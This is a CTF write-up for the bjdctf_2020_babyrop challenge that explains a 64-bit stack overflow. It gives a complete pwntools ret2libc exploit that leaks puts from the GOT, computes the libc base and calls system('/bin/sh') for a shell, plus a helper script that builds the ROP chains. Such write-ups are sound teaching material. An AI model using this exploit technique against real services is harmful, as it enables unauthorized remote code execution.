bjdctf_2020_babyrop

I originally thought I could do this directly with libcsearcher, but my libcsearcher could not find the libc, so I had to use the libc provided by BUU.

The overflow is in the `buf` variable of the `vuln` function: 0x20 bytes of `buf` reach the saved rbp, so the return address is overwritten at offset 0x28 (the exploit below pads 0x20 + 8 bytes).

```
> ROPgadget --binary=bjdctf_2020_babyrop --only="pop|ret"
Gadgets information
============================================================
0x000000000040072c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040072e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400730 : pop r14 ; pop r15 ; ret
0x0000000000400732 : pop r15 ; ret
0x000000000040072b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040072f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400590 : pop rbp ; ret
0x0000000000400733 : pop rdi ; ret
0x0000000000400731 : pop rsi ; pop r15 ; ret
0x000000000040072d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004c9 : ret
```

On 64-bit Linux (System V AMD64 ABI) the first integer arguments are passed in RDI, RSI, RDX, RCX, R8 and R9, in that order. Both calls we need, `puts(puts@got)` and `system("/bin/sh")`, take a single argument, so only RDI has to be loaded; that is why the `pop rdi ; ret` gadget at 0x400733 is the one used in the exploit.

[Figure: argument-passing convention]

The exploit is as follows:

```python
from pwn import *

# p = process('./bjdctf_2020_babyrop')
p = remote('node4.buuoj.cn', 29070)
elf = ELF('./bjdctf_2020_babyrop')
libc = ELF('./libc-2.23.so')   # the libc BUU provides for this challenge

pop_rdi = 0x400733             # pop rdi ; ret  (from the ROPgadget listing above)
main_addr = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

log.info("main_addr is [" + hex(main_addr) + "]")
log.info("puts_plt is [" + hex(puts_plt) + "]")

# 0x20 bytes of buf + 8 bytes of saved rbp, then the chain:
#   pop rdi ; ret  <- puts@got  ->  puts@plt  ->  main (to get a second overflow)
payload = b'a'*0x20 + b'a'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

log.info("use rop to get puts address:")

p.sendafter('Pull up your sword and tell me u story!\n', payload)

# puts prints the 6 non-zero bytes of the address, stops at the first NUL and
# appends '\n': strip the newline and pad back to 8 bytes before unpacking
puts_addr = u64(p.recvline()[:-1].ljust(8, b'\x00'))

log.info("puts_addr is [" + hex(puts_addr) + "]")
log.info("calculate offset address:")

# libc base = leaked runtime address - offset of puts inside libc-2.23.so
offset = puts_addr - libc.sym['puts']

log.info("get system and binsh address:")

system_addr = offset + libc.sym['system']
binsh_addr = offset + next(libc.search(b'/bin/sh'))

log.info("system addr is [" + hex(system_addr) + "]")
log.info("binsh addr is [" + hex(binsh_addr) + "]")

log.info("turn to sh interactive:")

# Second overflow: system("/bin/sh"). If system() crashes on a movaps instruction,
# the stack is misaligned; insert the plain 'ret' gadget (0x4004c9) before pop_rdi.
payload = b'a'*0x20 + b'a'*8 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter('Pull up your sword and tell me u story!\n', payload)

p.interactive()
```
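As an added example (not the author's exploit, and written against the standard library only so it runs offline without pwntools), the following isolates the two pieces of the exploit that are easy to get wrong: turning the bytes `puts` prints into an address, and checking that the computed libc base is plausible before trusting it. The gadget addresses are the ones from the ROPgadget listing above; the libc offsets `PUTS_OFF`, `SYSTEM_OFF` and `BINSH_OFF` are assumed placeholders for illustration, and in practice come from the libc ELF exactly as the exploit does (`libc.sym[...]`, `libc.search(...)`). The page-alignment check is the test a practitioner wants when, as happened to the author with libcsearcher, the libc version is in doubt: libc is mapped at a page boundary, so the low 12 bits of the leaked address must match the low 12 bits of the symbol's offset in the libc file.

```python
import struct

# Gadget addresses from the ROPgadget listing on this page (the binary has no PIE)
POP_RDI = 0x400733   # pop rdi ; ret
RET     = 0x4004c9   # ret, used only to realign the stack to 16 bytes

# Assumed offsets for illustration only; real values come from the libc ELF
# (libc.sym['puts'], libc.sym['system'], next(libc.search(b'/bin/sh')))
PUTS_OFF   = 0x6f690
SYSTEM_OFF = 0x45390
BINSH_OFF  = 0x18cd57


def p64(v):
    """Pack a 64-bit little-endian value, like pwntools' p64."""
    return struct.pack('<Q', v & 0xffffffffffffffff)


def parse_leak(line):
    """Turn the bytes puts() wrote for a GOT entry into an address.

    puts stops at the first NUL byte, so a canonical user-space address such as
    0x00007ffff7a64690 arrives as 6 bytes, followed by puts' own '\n'.
    Strip that newline and pad back to 8 bytes before unpacking.
    Caveat: recvline() cuts at the first 0x0a, so if the address itself could
    contain a 0x0a byte, read a fixed 6 bytes with recv(6) instead.
    """
    leak = line.rstrip(b'\n')
    if not 1 <= len(leak) <= 8:
        raise ValueError('unexpected leak length %d' % len(leak))
    return struct.unpack('<Q', leak.ljust(8, b'\x00'))[0]


def libc_base(leaked_puts, puts_off=PUTS_OFF):
    """Compute the libc base and sanity-check it.

    libc is mapped page-aligned, so base must end in 0x000. If it does not, the
    leaked address and the offset belong to different libc builds (or the leak
    is garbled), and every address derived from it would be wrong.
    """
    base = leaked_puts - puts_off
    if base & 0xfff:
        raise ValueError('leak 0x%x does not match puts offset 0x%x: wrong libc?'
                         % (leaked_puts, puts_off))
    return base


def leak_chain(pad, puts_got, puts_plt, main_addr):
    """Stage 1: puts(puts@got), then return to main for a second overflow."""
    return (b'a' * pad + p64(POP_RDI) + p64(puts_got)
            + p64(puts_plt) + p64(main_addr))


def shell_chain(pad, base, align=False, system_off=SYSTEM_OFF, binsh_off=BINSH_OFF):
    """Stage 2: system("/bin/sh").

    With align=True a bare 'ret' is inserted before 'pop rdi' so that rsp is
    16-byte aligned when system() runs; this is the fix for a crash on a
    movaps instruction inside libc.
    """
    chain = b'a' * pad
    if align:
        chain += p64(RET)
    return chain + p64(POP_RDI) + p64(base + binsh_off) + p64(base + system_off)


if __name__ == '__main__':
    # Constructed sample: what puts would print if puts were at 0x7ffff7a64690
    sample = b'\x90\x46\xa6\xf7\xff\x7f\n'
    addr = parse_leak(sample)
    base = libc_base(addr)
    print('puts   = %#x' % addr)
    print('base   = %#x' % base)
    print('stage2 = %s' % shell_chain(0x28, base, align=True).hex())
```

Run it stand-alone to see the parsed leak and the stage-2 chain for the constructed sample; with an offset from a different libc build (`libc_base(addr, 0x6f6a0)`), the alignment check raises instead of silently producing a bogus `system` address.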

Author: 饼干

Published: 2021-10-11

Updated: 2021-10-11